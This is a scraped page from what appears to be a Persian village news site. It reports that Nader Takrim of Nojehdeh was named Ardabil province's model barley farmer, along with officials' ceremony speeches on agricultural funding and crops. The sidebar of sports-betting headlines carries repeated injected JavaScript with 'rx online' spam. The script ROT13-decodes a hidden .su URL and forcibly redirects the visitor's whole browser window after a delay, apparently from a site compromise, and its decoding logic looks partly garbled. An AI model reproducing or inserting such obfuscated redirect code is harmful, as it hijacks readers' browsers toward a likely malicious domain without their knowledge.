301 Moved Permanently


nginx/1.15.9 (Ubuntu)
نادر تکریم نوجه ده بعنوان جوکار نمونه استان انتخاب شد : نوجه ده نیوز NojehdehNews@
rx online

Nojehdeh1

نادر تکریم نوجه ده بعنوان کشاورز نمونه و جوکار نمونه استان اردبیل انتخاب شد.

به گزارش خبرنگار وبسایت روستای نوجه ده نمین، باز هم افتخاری دیگر برای روستای نوجه ده رقم خورد و این بار برادر نادر تکریم بعنوان کشاورز نمونه استان انتخاب و از زحمات ایشان تجلیل بعمل آمد.خاطرنشان می شود تقریباً هرساله یکی از اهالی روستای نوجه ده بعنوان کشاورز نمونه استان انتخاب می شود و در این وادی روستای نوجه ده رکوردار بین روستاهای شهرستان نمین و استان اردبیل است.در همین ارتباط با حضور استاندار اردبیل و در آیینی ویژه از تولیدکنندگان برتر کشاورزی در استان اردبیل به عنوان قهرمانان اقتصاد مقاومتی در این استان تجلیل شد.

مجید خدابخش استاندار اردبیل روز چهارشنبه در آیین گفت: استان اردبیل بیش از یک میلیون و ۲۰۰ هزار نفر جمعیت دارد و یک سوم آن در بخش کشاورزی مشغول هستند.وی افزود: بیش از هفت بند از سیاست اقتصادمقاومتی مورد تاکید مقام معظم رهبری با کشاورزی مرتبط است و این امر اهمیت توجه به توسعه و تقویت بخش کشاورزی را نشان می دهد. وی اظهار کرد: دولت به رغم تنگناهای مالی، یک میلیارد دلار به بخش کشاورزی و مدیریت آب های مرزی استان اردبیل اختصاص داده است که در تاریخ استان اردبیل اختصاص این رقم اعتبار به یک طرح بی سابقه است.
خدابخش تامین ۳۰ هزار میلیارد ریال اعتبار برای هزینه در بخش کشاورزی و مهار آب های مرزی استان ظرف چهار سال آینده را تدبیر مثبت دولت دانست و اجرای آبیاری در سطح ۶۰ هزار هکتار در پایاب سد خدافرین بیله سوار مغان، دو نوبت شدن احداث سد عمارت در گرمی مغان و فعال شدن سد احمد بیگلو در مشکین شهر را از ثمرات آن برشمرد.
او ضرورت توجه به اقتصاد کشاورزی و استفاده از ایده های نتیجه بخش دنیا در جهت افزایش درآمد زارعان و بهره برداران را خاطر نشان شد.
استاندار اردبیل گفت: تولیدکنندگان کشاورزی استان نباید از کاهش قیمت محصولات این بخش متضرر شوند و باید با نهضت ایجاد ارزش افزوده و تبدیل ایده به ثروت، از فعالان بخش کشاورزی استان حمایت شود.
خدابخش افزود: توجه به مشاغل دانش بنیان در استان رو به افزایش است و با توجه به وجود پنج هزار دانش آموخته رشته های کشاورزی در استان، باید با استفاده از تجارب افراد موفق و فعالیت رسانه ها اشتغال در بخش کشاورزی توسعه یابد.
وی تحریم روسیه توسط اتحادیه اروپا، فاصله گرفتن آن کشور با ترکیه و ارتباط حسنه با ایران اسلامی را فرصتی طلایی برای اقتصاد استان اردبیل دانست و بر ارتقای کیفیت تولید و بسته بندی محصولات برای صدور به روسیه تاکید کرد.
عدیل سروی رئیس سازمان جهاد کشاورزی استان اردبیل نیز در این آئین توجه بیش از شعار به بخش کشاورزی، کاهش سود بانکی تسهیلات این بخش و بیمه شدن درآمد کشاورزان به جای محصولات آنها را در تدوین مقطع استانی برنامه ششم توسعه کشور خواستار شد.
وی گفت: ۴۹ طرح به مناسبت دهه فجر امسال در استان اردبیل به بهره برداری خواهد رسید و با به ثمر رسیدن سرمایه گذاری های انجام گرفته در آب و خاک استان در سال های آینده یک سوم تولید فعلی به ظرفیت تولید محصولات کشاورزی استان افزوده خواهد شد.
وی از فعال شدن احداث یا مراحل واگذاری گلخانه بیله سوار مغان، و دو مجتمع گلخانه ای در شهرستان های پارس آباد و کوثر و گلخانه ای دیگر در پایاب سدخدافرین با یک هزار هکتار وسعت خبر داد.
سروی اظهار کرد: استان اردبیل یک پنجم سیب زمینی با کیفیت کشور را تولید می کند و برای تنظیم بازار عرضه این محصول امسال زمینه صدور آن از استان به جمهوری آذربایجان فراهم شد و با همت سیب زمینی کاران استان در ۱۱ درصد سطح کشت این محصول تغییر کشت صورت گرفت.
رئیس سازمان جهاد کشاورزی استان اردبیل بیان کرد: امسال به منظور کاهش مصرف آب ، عرضه به موقع به بازار و تنظیم بازار تقاضا ۱۷ قطعه کشت پاییزه سیب زمینی در استان اجرا شده است.
سروی مشکل انبار سیب زمینی در استان را خاطرنشان شد و ظرفیت گنجایش انبارهای استان را فقط برای ذخیره پنج درصد این محصول کافی اعلام کرد و از صدور مجوز احداث چند انبار برای ذخیره ۱۱۰ هزار تن سیب زمینی در استان خبر داد.
وی از تشکیل کارگروه ها و کمیته های تدوین الگوی کشت مناسب در شهرستان ها خبر داد و کشت زعفران با ۷۲ تن تولید، توزیع ۲۵ هزار اصله نهال پسته و افزایش معرفی گونه گیاهان دارویی از ۴۶ به ۱۵۰ گونه و کشت آن در سطح ۵۶ هکتار در استان را از نتایج کارگروه ها برشمرد.
وی ادامه داد: چشم داشتن به مناطق خوش آب و هوا برای احداث ویلا و ساختمان، فرهنگ نادرستی است و حق نداریم خاک ارزشمند کشاورزی را به بهانه ساختمان سازی تخریب کنیم.
سروی رکورد بی سابقه تولید گندم در استان، افزایش ۳٫۵ برابری خرید مازاد نیاز این محصول نسبت به سال های قبل، تولید بالغ بر هفت هزار تن دانه های روغنی و احراز مقام در کشور را حاصل زحمت های کشاورزان استان برشمرد و مقدار تولید محصولات کشاورزی استان در سال زراعی جاری را بیش از چهار میلیون تن اعلام کرد.
او کشاورزان را جهادگران تامین امنیت غذایی کشور توصیف کرد و تلاش و همت آنها را مانع سوء استفاده دشمن در تضعیف اقتصاد ملی دانست.

Nojehdeh2
خانم امیری دبیر خانه کشاورز استان اردبیل نیز در این آئین الویت دادن به بخش کشاورزی از سوی دولت، تسهیل پرداخت تسهیلات بانکی این بخش، پرداخت خسارات مزارع ازبین رفته بیله سوار مغان در آتش سوزی، ترویج بیشتر دانش کشاورزی از رسانه ها، جلب اعتماد بهره برداران توسط بیمه با قسطی کردن مبالغ دریافتی از زارعان و پرداخت به موقع هزینه خسارات و توجه به تولید محصولات پاک در بخش کشاورزی استان را لازم دانست.
وی با اشاره به بحران آب و ضرورت مدیریت آن بر پرداخت تسهیلات بلاعوض، به روز شدن هزینه ها و مشارکت دولت با بخش خصوصی مجری طرح های آبیاری نوین تاکید کرد.
وی ضرورت تدوین سندجامع راهبردی در بخش کشاورزی استان را برای تعیین وظایف فعالان این بخش خاطر نشان شد و اجرا شدن آن را در ارتقای بهره وری کشاورزی موثر دانست.
حجت الاسلام اکبری مسوول حوزه نمایندگی ولی فقیه در سازمان جهاد کشاورزی استان اردبیل نیز در این همایش تقدیر از کشاورزان نمونه را سپاسگزاری از خداوند متعال دانست و بر تسهیل بستر تولید و تلاش بیشتر بهره برداران استان از سوی بخش های دولتی و خصوصی تاکید کرد.
وی گفت: به زراعی در تعهد دانشمندان امر در علوم مربوط دارد و صاحبان فکر و دانش در بخش کشاورزی در کسادی بازار و مشکلات بخش کشاورزی سهیم و مسوول هستند.
وی کشاورزان را مهندسان اقتصاد مقاومتی معرفی کرد و از خانم مظفری اولین زعفران کار شهرستان نمین به عنوان مروج کشت این محصول ذکر خیر کرد.
پخش کلیپ فعالیت کشاورزان موفق استان و گرامیداشت یاد و خاطره بهمن خلایقی تصویر بردار سازمان جهاد کشاورزی استان و ثبت کننده تلاش زارعان تلاش گر استان از بخش های قابل توجه این آئین بود.
در پایان با اهدای جوایزی از حسین حبی به عنوان گندم کار دیم برتر کشور با تولید شش تن و ۴۰۰ کیلو کیلو گندم در هکتار از گرمی مغان ، روشن نیکخویی کلزاکار نمونه استان از پارس آباد مغان، مریم رجبی بانوی نمونه و فعال عشایر استان از شهرستان خلخال، قاسم نجفی زنبوردار نمونه استان از مشکین شهر، فیروز جعفرزاده بهره بردار نمونه سیستم آبیاری بارانی از شهرستان نیر، محمد سلیمانی پرورش دهنده نمونه ماهیان سردابی از مشکین شهر، محمد حسنی کریم الهی گندم کار نمونه آبی از شهرستان اردبیل، نادر تکریم نوجه ده جوکار نمونه استان از شهرستان نمین، شیدا ظراف زعفران کار نمونه استان از شهرستان نمین و عین الله نصیری تولید کننده نمونه سیب زمینی در استان از شهرستان اردبیل تجلیل شد.

  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin
  • Youtube

Solheim Cup podcast: Anne Van Dam, Suzann Pettersen among guests

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Listen or subscribe on: Suzann Pettersen and ...

The most backed teams in the EFL Cup tonight

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); SWANSEA to beat at Watford Punters fancy ...

Burrow is the Odds-On Favorite to be the First Overall Pick in the 2020 NFL Draft

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); The 2019 school football season opened ...

Is Online Sports Betting Legal in New Mexico?

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Legal sports gambling has arrived in ...

Alex Iwobi feels like he has a 'new home' at Everton after Deadline Day move

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Alex Iwobi feels like he has ...

توييتر ما

No public Twitter messages.

حاميان ما